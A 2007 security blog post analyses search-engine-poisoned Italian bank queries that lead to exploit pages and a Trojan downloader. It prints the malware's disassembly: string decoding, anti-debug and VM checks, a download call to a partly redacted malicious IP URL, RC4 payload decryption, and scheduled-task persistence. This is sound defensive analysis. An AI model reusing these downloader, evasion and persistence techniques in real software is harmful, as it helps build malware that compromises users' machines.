Blog

Live.it Poisoned

03.26.2007 - 1:28 PM
Search Engine Poisoning is a topic that we have have researched at some length. We discussed the topic briefly in an October blog post: Search Engine Typosquatting. Our previous research focused on malicious URLs in search engine results from misspelled search terms; it was far less common to discover malicious content for legitimate search terms.

In early March, a report from Sunbelt demonstrated Microsoft Windows Live Search™ Italy returning exploit sites for extremely common search terms. Doing some additional research of our own, we performed searches for the names of financial companies, well-known banks, and lenders. The results were alarming. Many of the URLs in the search results linked to malicious sites capable of silently compromising the visitor.

In one simple example, I searched for the name of an Italian bank without making any typographical errors. Terms like "Banca (name of bank) Roma" and "Banca (name of bank) Milano" produced a series of malicious results that, when visited, could result in a complete compromise of my machine.

The official website of the bank we were searching for (a well-known Italian bank) does not appear in any of the results. Many of the results are malicious, but we're going to pick a single example to focus on. A visit to the fifth link returned loaded the following page:

This looks like it might be an official Lycos page, but it is actually a fake. The page actually contains an IFRAME that takes the user without his or her knowledge to another website that contains obfuscated exploit code. On an unpatched machine, this exploit code will silently download and install a malicious file. However, because my OS is patched, I am prompted for permission to let the ActiveX installation continue.

Many additional Italian keywords lead to pages that look like this:

Almost all of the pages we came across use the nearly identical JavaScript obfuscation, possibly indicating that the same group is behind all of these results. This specific JavaScript obfuscation uses the arguments.callee() function to produce "Code Length Dependent Obfuscation", as discussed in these articles:

The problem appears to be most apparent with Live Search, but similar results are returned with both Google and Yahoo! (often further down the page).

The malicious code grabbed in the form of various .cab files is a Trojan Downloader that attempts to connect to a specific IP to download another FSG2 packed file. The IPs involved are based in either the Ukraine or Moldavia and have been known in the past to be hosting malcode.

Here comes the Malcode

The cab files host an executable as well as an ini file that basically tells how to run the application.

Contents of ini:

---------------------------------
[Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\plh.exe
[Version]
Signature="$CHICAGO$"
AdvancedInf=2.0
---------------------------------

The executable and ini files have randomly generated names and lengths. They are all packed with FSG2 and are all identical except for two bytes after the "MZ" letters, in the executable headers. The files are very small, 3489 bytes. Nowadays, a very small file size is usually a sign of downloaded malwares, and that's indeed what those files are.

The file is written in Visual C++ and is compiled to take very little space.

The very first subroutine (shown below) is a little confusing, even if the code seems crystal clear:

We can see code looking like single-step detection code, using GetTickCount twice to find out if the application is being single-stepped. No action is taken if the difference between the two TickCounts is above a reference number found in the code. We also see code using the SIDT instruction to grab the IDT base, and we can see the usual comparison to detect VM, but again no action is taken, and the subroutine doesn't return any value either.

The code isn't Dual Core or HT compliant either. It's still unclear if this is "dead" code left by the author, or just a naive attempt to fool some emulation engine. As you will see later on, the second sample uses the same code but takes action depending on the results. There must be a bug in the first sample, because they forgot to add code to exit the process if the application is traced or in a VM.

Another notable thing in the binary is that it uses different string encoding for every string it wishes to protect, to avoid quick string decoding, such as that performed by a generic IDC script. Strings are decoded onto the stack and never overwrite the encoded strings.

seg001:0040109F FF 35 24 20 40 00 push    ptr_to_str
seg001:004010A5 5E                pop     esi
seg001:004010A6 8B 7D FC          mov     edi, [ebp+var_4]
seg001:004010A9 6A 08             push    8
seg001:004010AB 59                pop     ecx
seg001:004010AC               decode_string
seg001:004010AC AC                lodsb
seg001:004010AD 04 8E             add     al, 8Eh
seg001:004010AF 2C 64             sub     al, 64h
seg001:004010B1 AA                stosb
seg001:004010B2 49                dec     ecx
seg001:004010B3 75 F7

Another example:

seg001:00401207 BE 58 20 40 00    mov     esi, offset aWsastartup
seg001:0040120C FF 75 FC          push    [ebp+var_4]
seg001:0040120F 5F                pop     edi
seg001:00401210 6A 0B             push    0Bh
seg001:00401212 59                pop     ecx
seg001:00401213               decode_string_0
seg001:00401213 AC                lodsb
seg001:00401214 34 D7             xor     al, 0D7h
seg001:00401216 2C 2D             sub     al, 2Dh
seg001:00401218 AA                stosb
seg001:00401219 49                dec     ecx
seg001:0040121A 75 F7             jnz     short decode_string_0

The byte operations are either ADD, SUB, or XOR. The string encoding is used primarily to hide some API function names to be used with GetProcAddress or module names for LoadLibrary. It's also used to hide names of Mutexes, Domains to resolve, and the like.

Eventually, it tries to download a file using wininet API functions:

004018BF  |. 53             PUSH EBX
004018C0  |. 53             PUSH EBX
004018C1  |. 53             PUSH EBX
004018C2  |. 53             PUSH EBX
004018C3  |. FF75 F0        PUSH DWORD PTR SS:[EBP-10]
                ; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
004018C6  |. FF55 E8        CALL DWORD PTR SS:[EBP-18]
                ;  wininet.InternetOpenA

[...]


004018D4  |. 53             PUSH EBX
004018D5  |. 68 00010884    PUSH 84080100
004018DA  |. 53             PUSH EBX
004018DB  |. FF35 F4214000  PUSH DWORD PTR DS:[4021F4]
                        ;  hwnbsqnn.00402270
004018E1  |. FF75 F8        PUSH DWORD PTR SS:[EBP-8]
                        ;  "http://195.[removed]/view/logo.jpg?f[removed]"
004018E4  |. 50             PUSH EAX
004018E5  |. FF55 FC        CALL DWORD PTR SS:[EBP-4]
                        ;  wininet.InternetOpenUrlA

The downloaded file is encrypted and put onto the HEAP. The reverse engineering of the decryption suggests that it's encrypted using the RC4 algorithm. (We can see the init of the 256 sbox, the permutation with the encryption key, and then the final encryption/decryption in the code.)

seg001:00401B0D
seg001:00401B0D               loc_401B0D:
seg001:00401B0D FF 37             push    dword ptr [edi]
seg001:00401B0F B9 08 22 40 00    mov     ecx, offset RC4_key ; "mgwyjkd5l"
seg001:00401B14 56                push    esi
seg001:00401B15 56                push    esi
seg001:00401B16 6A 09             push    9
seg001:00401B18 5A                pop     edx
seg001:00401B19 E8 12 00 00 00    call    RC4_routine

Here is a snippet of the routine:

seg001:00401B33 81 EC 0C 01 00 00 sub     esp, 10Ch
seg001:00401B39 89 4D F4          mov     [ebp-0Ch], ecx
seg001:00401B3C 89 55 F8          mov     [ebp-8], edx
seg001:00401B3F 33 C9             xor     ecx, ecx
seg001:00401B41 31 C0             xor     eax, eax
seg001:00401B43               RC4_Init
seg001:00401B43 88 84 28 F4 FE FF+mov     [eax+ebp-10Ch], al
seg001:00401B4A 40                inc     eax
seg001:00401B4B 3D 00 01 00 00    cmp     eax, 256        ; S-Table : S0-S255
seg001:00401B50 72 F1             jb      short RC4_Init
seg001:00401B52 53                push    ebx
seg001:00401B53 56                push    esi
seg001:00401B54 57                push    edi
seg001:00401B55 88 4D FE          mov     [ebp-2], cl     ; Swap
seg001:00401B58 88 4D FF          mov     [ebp-1], cl
seg001:00401B5B 33 FF             xor     edi, edi
seg001:00401B5D               loc_401B5D:
seg001:00401B5D 57                push    edi
seg001:00401B5E 58                pop     eax
seg001:00401B5F 33 D2             xor     edx, edx
seg001:00401B61 F7 75 F8          div     dword ptr [ebp-8] ; Modulo
seg001:00401B64 8B 45 F4          mov     eax, [ebp-0Ch]
seg001:00401B67 8D B4 2F F4 FE FF+lea     esi, [edi+ebp-10Ch]
seg001:00401B6E 8A 04 10          mov     al, [eax+edx]
seg001:00401B71 8A 16             mov     dl, [esi]
seg001:00401B73 02 06             add     al, [esi]
seg001:00401B75 00 45 FF          add     [ebp-1], al

Once decrypted, the malicious file checks to determine if it was decoded to a PE file by comparing the two first bytes with MZ. It is then dropped onto the hard disk, using a random name in the temp directory. The file is then executed.

Example: C:\Documents and Settings\user\Local Settings\Temp\ozbjrc.exe

Analysis of the second file:

The second file is also packed by FSG2 and written in Visual C++. It uses the same string decoding techniques, and it also has the RC4 code embedded, which means that it probably decrypts another file. It's also rather small.

It also uses the single-step detection, as well as the IDT base check. But this time, if something is detected, the application just quits. They fixed their bugs. ;-)

First Sample:

seg001:0040108F E8 1C 02 00 00    call    CheckTraceAndCheckVM ; No Action Taken
seg001:00401094 6A 08             push    8
seg001:00401096 58                pop     eax

Second Sample:

seg001:0040137F                   call    CheckTraceAndCheckVM
seg001:00401384                   and     al, al
seg001:00401386                   jz      short good_reverser
seg001:00401388                   push    0               ; Bad Reverser
seg001:0040138A                   call    ds:exit

One interesting thing to note is the use of the Service API functions to check whether the Schedule service is started. If it is not, the malware starts it.

Using COM, it accesses the scheduler and creates a new TASK with a random name. The task is meant to run the second file (the one that got decrypted in the first place) at system startup, as NT AUTHORITY SYSTEM, which means full access to the machine (on the default installation of the infected machine). The file is set to Read Only, and locked by the malware, to prevent easy deletion.

Other than that, it decrypts API function names and dll names, and uses wininet to try to download yet another file.

At the time of this write-up, no files are available to download, but the names are generated randomly, and the authors could place files to be downloaded any day.

The first downloader managed to grab its files from a website in Moldova, and the second downloader tries to get its files from inhoster, which is located in the Ukraine. These countries are geographically close.

It's also important to note that the files use the Sleep() API function regularly, to wait a few minutes before trying to download a file again. It's obvious that the malware created the new task in order to restart and probe URLS for hours/days/months until the authors have placed an encrypted update that will be downloaded, decrypted, and executed.

At this point, it could be anything from a BOT to a rootkit, and on default installation, it would run as an administrator, introducing full system compromise.

Researchers: Patrick Comiotto, Nicolas Brulez
Bookmark This Post:

Post a Comment: